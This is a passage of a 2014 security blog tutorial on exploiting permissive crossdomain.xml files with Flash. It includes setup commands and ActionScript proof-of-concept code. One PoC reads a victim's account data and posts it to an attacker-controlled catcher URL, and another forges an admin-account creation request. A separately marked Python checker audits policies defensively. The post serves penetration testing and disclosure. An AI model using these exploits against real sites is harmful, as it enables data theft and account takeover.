</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span><span style="line-height: 125%;">
</span><span style="color: #666666; line-height: 125%;">}</span></pre>
</div>
<br />
When the victim loads the compiled Flash object, the SWF does three things:<br />
<br />
1) The SWF sends a request from the victim's browser to a page that returns the CSRF token<br />
2) The SWF grabs the CSRF token from the returned page<br />
3) The SWF sends a second request, using the stolen CSRF token, that changes the email address on the account to the attacker's email address<br />
<br />
At that point the attacker just needs to fill out the forgot password feature using their own email address, and they will be able to hijack the account. <br />
<br />
<br /><b>Exploiting misconfigured crossdomain.xml files</b><br />
Seth Art, 2014-03-14<br />
<br />
An overly permissive crossdomain.xml file on a domain that serves sensitive content is a major security risk. It exposes the domain hosting the improperly configured crossdomain.xml file to information disclosure and request forgery. Attackers can not only forge requests, they can also read the responses. This means the attacker can retrieve any information the authenticated user has access to, including account information, documents and files, and anti-CSRF tokens if they are used.<br />
<div>
<span style="font-weight: normal;"><span style="background-color: white; color: #222222; font-family: "verdana" , sans-serif; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-NEyToNgS5Pk/Ux8d16DNVLI/AAAAAAAAAMI/nqGYenqlois/s1600/open_crossdomain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "verdana" , sans-serif;"><img border="0" src="https://2.bp.blogspot.com/-NEyToNgS5Pk/Ux8d16DNVLI/AAAAAAAAAMI/nqGYenqlois/s1600/open_crossdomain.png" /></span></a></div>
<div>
<h2>
<span style="font-size: large;">History</span></h2>
</div>
<div>
This is an old vulnerability. How old? 8 years old. Here is a very rough outline of prior research and public discussion:</div>
<br />
<b>2006: </b><a href="http://shiflett.org/blog/2006/sep/the-dangers-of-cross-domain-ajax-with-flash">Chris</a> <a href="http://shiflett.org/blog/2006/oct/the-crossdomain.xml-witch-hunt">Shiflett</a>, <a href="http://blog.monstuff.com/archives/000302.html">Julien Couvreur</a>, and <a href="http://jeremiahgrossman.blogspot.com/2006/10/crossdomainxml-statistics.html">Jeremiah Grossman</a> started talking about this publicly. <br />
<b>2008:</b> Jeremiah Grossman <a href="http://jeremiahgrossman.blogspot.com/2008/05/crossdomainxml-invites-cross-site.html">revisited</a> the issue.<br />
<b>2010:</b> <a href="http://erlend.oftedal.no/blog/?blogid=102">Erlend Oftedal</a> wrote about it, and <a href="https://www.blackhat.com/presentations/bh-dc-10/Bailey_Mike/BlackHat-DC-2010-Bailey-Neat-New-Ridiculous-flash-hacks-slides.pdf">Mike Bailey</a> gave a talk at Black Hat DC.<br />
<b>2011:</b> Teams from <a href="http://www.ics.forth.gr/_publications/crossdomainxml_eurosec11.pdf">FORTH-ICS</a>, <a href="https://owasp.org/images/7/78/05A_Client-Side_Cross-Domain_Requests_-_Sebastian_Lekies%2BWalter_Tighzert.pdf">SAP</a> <a href="http://w2spconf.com/2011/papers/cross_domain_Nation.pdf">Research</a>, and <a href="http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf">UC San Diego</a> all released research directly related to crossdomain.xml and the security risks that result from misconfiguration.<br />
<br />
While there have been people in the know about this vulnerability since 2006, and some really great research published in 2011, this vulnerability has never really gained much traction. <br />
<br />
Here are some Google search results, as of March 2014:<br />
<br />
<table style="table-layout: fixed; width: 374px;"><colgroup><col style="width: 247px;"></col><col style="width: 127px;"></col></colgroup><tbody>
<tr><th style="background-color: #3498db; border: 0px solid rgb(153, 153, 153); color: white; font-family: Arial, sans-serif; font-weight: normal; overflow: hidden; padding: 10px 5px; word-break: normal;">Search Term</th><th style="background-color: #3498db; border: 0px solid rgb(153, 153, 153); color: white; font-family: Arial, sans-serif; font-weight: normal; overflow: hidden; padding: 10px 5px; word-break: normal;">Result</th></tr>
<tr><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">“crossdomain.xml exploit”</td><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">34 unique hits</td></tr>
<tr><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">“crossdomain.xml attack”</td><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">26 unique hits</td></tr>
<tr><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">“crossdomain.xml vulnerability”</td><td style="background-color: #f7fdfa; border: 0px solid rgb(153, 153, 153); color: #444444; font-family: Arial, sans-serif; overflow: hidden; padding: 10px 5px; word-break: normal;">18 unique hits</td></tr>
</tbody></table>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Six months ago, I ran across my first extremely permissive crossdomain.xml file, but I was left with two questions:</span>
<br />
<ul>
<li><span style="font-family: inherit;">How do I determine if there is really any risk to this particular web application? </span></li>
<li><span style="font-family: inherit;">If there is risk, how can I demonstrate this with a working exploit? </span></li>
</ul>
<span style="font-family: inherit;"></span><br />
<div>
<span style="font-family: inherit;">The answer to the first question can be found in the articles and papers that I linked to above. The answer to the second question, however, was not very accessible until recently. </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">In August 2013, Gursev Kalra released an </span><a href="http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html" style="font-family: inherit;">excellent blog post</a><span style="font-family: inherit;"> and uploaded his sample ActionScript exploit code to </span><a href="https://github.com/gursev/flash-xdomain-xploit" style="font-family: inherit;">GitHub</a>.<span style="font-family: inherit;"> </span><span style="font-family: inherit;">Thanks to Gursev, I finally had the information I needed to be able to put all the pieces together and exploit this vulnerability.</span></div>
<div>
<br /></div>
<h2>
<span style="font-size: large;">
The Vulnerability</span></h2>
<div>
As a general rule, if the following three conditions are met, there is a problem:</div>
<div>
<ol>
<li>A crossdomain.xml file is hosted at the root of the host, for example: <span style="color: blue;">www.secret-site.com/crossdomain.xml.</span></li>
<li>The crossdomain.xml is overly permissive.</li>
<li>There is either sensitive information on<span style="color: blue;"> www.secret-site.com</span> or there are sensitive actions that can be performed on <span style="color: blue;">www.secret-site.com.</span></li>
</ol>
<br />
If #1 and #2 are met, but <span style="color: blue;">www.secret-site.com</span> does not contain any sensitive information, or does not include the ability to perform any sensitive actions, there is no risk to having a wide open crossdomain.xml file. There is no point in making a victim make a request to a page for you if the information is all public and you can see everything anyway.<br />
<br />
However, if there are sensitive actions that can be performed or information that can be stolen, and <span style="color: blue;">www.secret-site.com</span> has an overly permissive crossdomain.xml file, the application at <span style="color: blue;">www.secret-site.com</span> is essentially opening the door to any malicious SWF loaded from anywhere on the web. For example, a SWF loaded from <span style="color: red;">www.malicious-site.com</span> is now able to bypass the Same Origin Policy and gain access to everything that the authorized user of <span style="color: blue;">www.secret-site.com</span> has access to. Put differently, the overly permissive crossdomain.xml file allows Flash to do something that even JavaScript is not allowed to do: read cross-domain resources.</div>
<div>
<br />
<i>Note: The most permissive configuration option is the following line: <b>&lt;allow-access-from domain="*"&gt;</b>. That is not the only overly permissive setting. Check out the reference papers listed above to find more.</i><br />
<br />
<i>Note: </i><i>API sites that require a pre-shared key are </i><i>an exception to the conditions listed above. In this case, even when all three conditions are met, if www.secret-site.com requires an API key or something similar to access the content, there is no risk. The attacker has no way of knowing the pre-shared secret API key, and therefore they cannot forge a request with all of the required information to exploit the permissive crossdomain.xml.</i><br />
<i><br /></i>
<i>Note: In my examples, I use <span style="background-color: yellow;">www</span> as the hostname (<span style="color: blue;"><span style="background-color: yellow;">www</span>.secret-site.com</span>). The security implications of the crossdomain.xml are specific to the fully qualified domain name, including hostname and/or subdomain if they are present. For example, if <span style="color: blue;">https://<span style="background-color: yellow;">www</span>.secret-site.com/crossdomain.xml</span> contains </i><b style="font-style: italic;">&lt;allow-access-from domain="*"&gt;</b><i>, but all of the sensitive transactions happen on </i><span style="color: blue; font-style: italic;">https://<span style="background-color: yellow;">secure</span>.secret-site.com</span><i>, there is no risk. Of course,</i> if <span style="color: blue; font-style: italic;">https://<span style="background-color: yellow;">secure</span>.secret-site.com/crossdomain.xml</span><i> exists and it also has an overly permissive policy, then we are back in business. </i><br />
<i><br /></i></div>
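As an added example (not code from the original post or from the crossdomain-exploitation framework), the following Python checker applies the three conditions above to a policy document: it flags the permissive settings named in the notes, including <code>domain="*"</code>, and treats a policy as applying only to the exact host that serves it, so a wide-open www.secret-site.com policy is not counted against secure.secret-site.com. Both policy documents are constructed for illustration.

```python
"""Audit a crossdomain.xml body for overly permissive settings.

Added example; not part of the original post or its framework.
The two policy documents below are constructed, not captured from any site.
"""
import xml.etree.ElementTree as ET

# Constructed: the wide-open policy the post warns about.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed: a least-privilege policy that trusts one named host over HTTPS only.
RESTRICTIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.secret-site.com" secure="true"/>
</cross-domain-policy>
"""


def audit_crossdomain_policy(xml_text):
    """Return a list of (severity, message) findings for one crossdomain.xml body."""
    findings = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("info", f"not a well-formed XML policy: {exc}")]
    if root.tag != "cross-domain-policy":
        return [("info", f"root element is <{root.tag}>, not <cross-domain-policy>")]

    # "all" lets any other policy file on the host widen access beyond the master policy.
    for sc in root.findall("site-control"):
        if sc.get("permitted-cross-domain-policies", "") == "all":
            findings.append(("medium", 'site-control permits "all" policy files'))

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        secure = rule.get("secure", "true").lower()
        if domain == "*":
            findings.append(("high", 'allow-access-from domain="*": a SWF from any origin can read responses'))
        elif domain.startswith("*."):
            findings.append(("medium", f'allow-access-from wildcard subdomain "{domain}"'))
        if secure == "false":
            findings.append(("medium", f'secure="false" for "{domain}": HTTP-served SWFs may read HTTPS content'))

    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain", "") == "*":
            findings.append(("high", 'allow-http-request-headers-from domain="*": any origin may send custom headers'))

    return findings


def is_overly_permissive(xml_text):
    """Condition 2 from the post: any high-severity finding makes the policy overly permissive."""
    return any(sev == "high" for sev, _ in audit_crossdomain_policy(xml_text))


def policy_applies_to(policy_host, sensitive_host):
    """A crossdomain.xml governs only the exact FQDN that serves it (the post's www vs. secure note)."""
    return policy_host.lower().rstrip(".") == sensitive_host.lower().rstrip(".")


def assess_risk(policy_host, policy_xml, sensitive_hosts):
    """All three conditions: a policy exists on policy_host, it is overly permissive,
    and sensitive content or actions live on that same host."""
    if not is_overly_permissive(policy_xml):
        return False
    return any(policy_applies_to(policy_host, h) for h in sensitive_hosts)


if __name__ == "__main__":
    for name, body in (("permissive", PERMISSIVE_POLICY), ("restrictive", RESTRICTIVE_POLICY)):
        print(name, audit_crossdomain_policy(body))
    print("www risk:", assess_risk("www.secret-site.com", PERMISSIVE_POLICY, ["www.secret-site.com"]))
    print("secure risk:", assess_risk("www.secret-site.com", PERMISSIVE_POLICY, ["secure.secret-site.com"]))
```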
<div>
<h2>
<span style="font-size: large;">
Exploitation</span></h2>
<div>
<span style="color: red;">*****</span><br />
<span style="color: red;"><b>Update: If you don't want to follow the step by step below, I have automated it. </b></span><br />
<b>Check it out here: <a href="https://github.com/sethsec/crossdomain-exploitation-framework">https://github.com/sethsec/crossdomain-exploitation-framework</a></b><br />
<b>Demo here: <a href="https://www.youtube.com/watch?v=v5DIcAtnKRU#t=23m59s">https://www.youtube.com/watch?v=v5DIcAtnKRU#t=23m59s</a></b><br />
<br />
At first I made a bash script that just automated what you see below, but after that I switched to Python, and now you don't even need to set up Apache or anything like that. The Python script will set everything up, help you configure your payload, and start a simple, custom web server for you:<br />
<span style="color: red;">*****</span><br />
<br /></div>
And now the fun part. For the demo, I’m using Kali Linux. If you want to take advantage of the vulnerability described above, you need to modify and compile a SWF and host it on a web server. The steps below show you how to do that, from start to finish. <br />
<br />
1) Install Adobe Flex:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> apt-get install openjdk-6-jdk
mkdir /opt/flex
<span style="color: #aa22ff;">cd</span> /opt/flex/
wget http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip
unzip flex_sdk_4.6.zip
chmod -R a+rx /opt/flex/
<span style="color: #aa22ff;">echo</span> <span style="color: #bb4444;">'export PATH=/opt/flex/bin:$PATH'</span> >> ~/.bashrc
chmod 755 bin/mxmlc
</pre>
</div>
<br />
2) Download Gursev’s exploit code (the .as and the .html files) from <a href="https://github.com/gursev/flash-xdomain-xploit">GitHub</a> or copy/paste from his <a href="http://gursevkalra.blogspot.com/2013/08/bypassing-same-origin-policy-with-flash.html">blog</a>. In either case, you want to save the HTML into the web root (/var/www/crossdomain/xdx.html), and the AS file in a working folder outside of your web root (~/crossdomain/XDomainXploit.as). <br />
<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> mkdir /var/www/crossdomain
mkdir ~/crossdomain
<span style="color: #aa22ff;">cd</span> ~
git clone https://github.com/gursev/flash-xdomain-xploit.git
cp flash-xdomain-xploit/xdx.html /var/www/crossdomain/
cp flash-xdomain-xploit/XDomainXploit.as ~/crossdomain/
vi ~/crossdomain/XDomainXploit.as
</pre>
</div>
<br />
If for some reason you don't have the git client or the git command in the previous box doesn't work, you can use wget:<br />
<!-- HTML generated using hilite.me --><br />
<div style="background: #f8f8f8; border-width: .1em .1em .1em .8em; border: solid gray; overflow: auto; padding: .2em .8em; width: auto;">
<pre style="line-height: 125%; margin: 0;"> <span style="color: #aa22ff;">cd</span> /var/www/crossdomain
wget https://raw.github.com/gursev/flash-xdomain-xploit/master/xdx.html
<span style="color: #aa22ff;">cd</span> ~/crossdomain
wget https://raw.github.com/gursev/flash-xdomain-xploit/master/XDomainXploit.as
vi ~/crossdomain/XDomainXploit.as
</pre>
</div>
<br />
3) Modify the ActionScript file to fit your needs. To make a basic GET request, Gursev's comments are self-explanatory: you just replace the victim URL and the attacker URL. <span style="background-color: yellow;">My changes are highlighted in yellow</span>.<br />
<br />
<div style="background-position: initial initial; background-repeat: initial initial; border: solid gray; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// XDomainXploit.as</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">package</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.display.</span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.events.</span><span style="background-color: #f8f8f8; color: #666666;">*;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">class</span><span style="background-color: #f8f8f8;"> XDomainXploit </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">extends</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> XDomainXploit() {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// Target URL from where the data is to be retrieved</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readFrom</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="color: #bb4444;"><span style="background-color: #f8f8f8;">"</span><span style="background-color: yellow;">http://www.secret-site.com/account/info</span><span style="background-color: #f8f8f8;">"</span></span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(readFrom);
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> getLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
getLoader.addEventListener(</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">.COMPLETE</span><span style="background-color: #f8f8f8; color: #666666;">,</span><span style="background-color: #f8f8f8;"> eventHandler);
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
getLoader.load(readRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">private</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> eventHandler(event</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Event</span><span style="background-color: #f8f8f8;">)</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8;">void {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// URL to which retrieved data is to be sent</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendTo</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: yellow; color: #bb4444;">http://malicious-site.com/catcher.php</span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(sendTo);
sendRequest.method </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8;">.POST</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
sendRequest.data </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> event.target.data</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> sendLoader</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8;">();
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">try</span><span style="background-color: #f8f8f8;"> {
sendLoader.load(sendRequest);
} </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">catch</span><span style="background-color: #f8f8f8;"> (error</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">Error</span><span style="background-color: #f8f8f8;">) {
</span><span style="background-color: #f8f8f8; color: #00a000;">trace</span><span style="background-color: #f8f8f8;">(</span><span style="background-color: #f8f8f8; color: #bb4444;">"Error loading URL: "</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">+</span><span style="background-color: #f8f8f8;"> error);
}
}
}
}
</span></pre>
</div>
<br />
If you want to have the SWF make a POST request, or if you need to set an HTTP header, you can use my example below:<br />
<br />
<div style="background-position: initial initial; background-repeat: initial initial; border: solid gray; overflow: auto; padding: 0.2em 0.8em; width: auto;">
<pre style="line-height: 125%; margin: 0px;"><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// POC Author: Gursev Singh Kalra (gursev.kalra@foundstone.com)</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// POC Modified to send POSTs and append HTTP headers: Seth Art</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// XDomainXploit.as</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">package</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.display.</span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.events.</span><span style="background-color: #f8f8f8; color: #666666;">*;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequestMethod</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">import</span><span style="background-color: #f8f8f8;"> flash.net.</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLLoader</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: yellow;"><span style="color: #aa22ff; font-weight: bold;">import</span> flash.net.<span style="color: #aa22ff;">URLRequestHeader</span><span style="color: #666666;">;</span></span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">class</span><span style="background-color: #f8f8f8;"> XDomainXploit3 </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">extends</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">Sprite</span><span style="background-color: #f8f8f8;"> {
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">public</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">function</span><span style="background-color: #f8f8f8;"> XDomainXploit3() {
</span><span style="background-color: #f8f8f8; color: #008800; font-style: italic;">// Target URL from where the data is to be retrieved</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readFrom</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">String</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: yellow; color: #bb4444;">https://www.secret-site.com/admin/add</span><span style="background-color: #f8f8f8; color: #bb4444;">"</span><span style="background-color: #f8f8f8; color: #666666;">;</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: yellow;"><span style="color: #aa22ff; font-weight: bold;">var</span> header<span style="color: #666666;">:</span><span style="color: #aa22ff;">URLRequestHeader</span> <span style="color: #666666;">=</span> <span style="color: #aa22ff; font-weight: bold;">new</span> <span style="color: #aa22ff;">URLRequestHeader</span>(<span style="color: #bb4444;">"Content-Type"</span><span style="color: #666666;">,</span> <span style="color: #bb4444;">"text/plain; charset=UTF-8"</span>);</span><span style="background-color: #f8f8f8;">
</span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">var</span><span style="background-color: #f8f8f8;"> readRequest</span><span style="background-color: #f8f8f8; color: #666666;">:</span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #666666;">=</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff; font-weight: bold;">new</span><span style="background-color: #f8f8f8;"> </span><span style="background-color: #f8f8f8; color: #aa22ff;">URLRequest</span><span style="background-color: #f8f8f8;">(readFrom);
</span><span style="background-color: yellow;">readRequest.method <span style="color: #666666;">=</span> <span style="color: #aa22ff;">URLRequestMethod</span>.POST
readRequest.data <span style="color: #666666;">=</span> <span style="color: #bb4444;">"{\"name\":\"CSRF-Admin\",\"Group\":\"admin\",\"password\":\"password\",\"confirmPassword\":\"password\"}"</span><span style="color: #666666;">;</span>
readRequest.requestHeaders.push(header);</span><span style="background-color: #f8f8f8;">
